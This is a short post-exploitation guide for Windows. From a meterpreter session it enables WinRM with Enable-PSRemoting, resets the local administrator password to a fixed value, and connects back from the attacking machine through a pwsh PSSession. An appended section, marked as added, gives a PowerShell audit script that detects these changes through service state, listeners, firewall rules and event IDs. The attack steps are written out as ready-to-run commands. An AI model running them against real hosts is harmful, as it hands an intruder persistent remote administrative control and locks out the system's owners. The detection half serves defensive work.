Enable WinRM with metasploit

WinRM uses the default ports 5985 and 5986.


  • Exploit the target
  • Open a meterpreter session
  • Load the meterpreter PowerShell extension

load powershell

  • Enable WinRM (Enable-PSRemoting starts the WinRM service, creates the HTTP listener on 5985 and opens the matching firewall rules)

powershell_execute 'Enable-PSRemoting -Force'

  • Change the administrator password

powershell_execute 'net user administrator Passw0rd1_123'

  • From the attacking machine, use PowerShell on Linux (pwsh) to connect to the target through a PSSession

pwsh
$credentials = Get-Credential
# administrator
# Passw0rd1_123
Enter-PSSession -ComputerName x.x.x.x -Authentication Negotiate -Credential $credentials
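As an added check that is not part of the original post: a PowerShell audit, run as an administrator on the Windows host, that surfaces the artifacts the steps above leave behind (WinRM service state, configured listeners, the WinRM firewall rule group, and the password-reset and WinRM-listening events). Security event ID 4724, System event ID 10148 from the Microsoft-Windows-WinRM provider and the "Windows Remote Management" firewall display group are assumed here from Microsoft's documentation.

```powershell
# Added defensive example, not code from the original post.
# Audits a host for the changes left by Enable-PSRemoting and a local
# administrator password reset. Run in an elevated PowerShell session.
# Assumed event IDs: 4724 (Security, "attempt to reset an account's
# password") and 10148 (System, WinRM service is listening for WS-Man).

$since = (Get-Date).AddDays(-1)

# 1. WinRM service: Enable-PSRemoting sets it to run and start automatically.
$svc = Get-Service -Name WinRM
"WinRM service: status=$($svc.Status) startType=$($svc.StartType)"

# 2. WS-Man listeners: Enable-PSRemoting creates an HTTP listener on port 5985.
Get-ChildItem -Path WSMan:\localhost\Listener -ErrorAction SilentlyContinue |
    ForEach-Object {
        $props = Get-ChildItem -Path $_.PSPath
        $transport = ($props | Where-Object Name -eq 'Transport').Value
        $port      = ($props | Where-Object Name -eq 'Port').Value
        "Listener: transport=$transport port=$port"
    }

# 3. Firewall rules in the WinRM group: Enabled=True means 5985/5986 are reachable.
Get-NetFirewallRule -DisplayGroup 'Windows Remote Management' -ErrorAction SilentlyContinue |
    Select-Object DisplayName, Enabled, Profile |
    Format-Table -AutoSize

# 4. Password resets of local accounts in the last 24 hours (Security 4724);
#    'net user administrator <pwd>' run from a meterpreter session logs one.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4724; StartTime = $since } `
    -ErrorAction SilentlyContinue |
    ForEach-Object { "4724 at $($_.TimeCreated): $($_.Message.Split("`n")[0])" }

# 5. WinRM started listening in the last 24 hours (System 10148).
Get-WinEvent -FilterHashtable @{ LogName = 'System'; ProviderName = 'Microsoft-Windows-WinRM';
                                 Id = 10148; StartTime = $since } `
    -ErrorAction SilentlyContinue |
    ForEach-Object { "10148 at $($_.TimeCreated): WinRM listening" }
```

Forward the Security and System logs centrally, since an attacker with an administrative meterpreter session can clear them on the host.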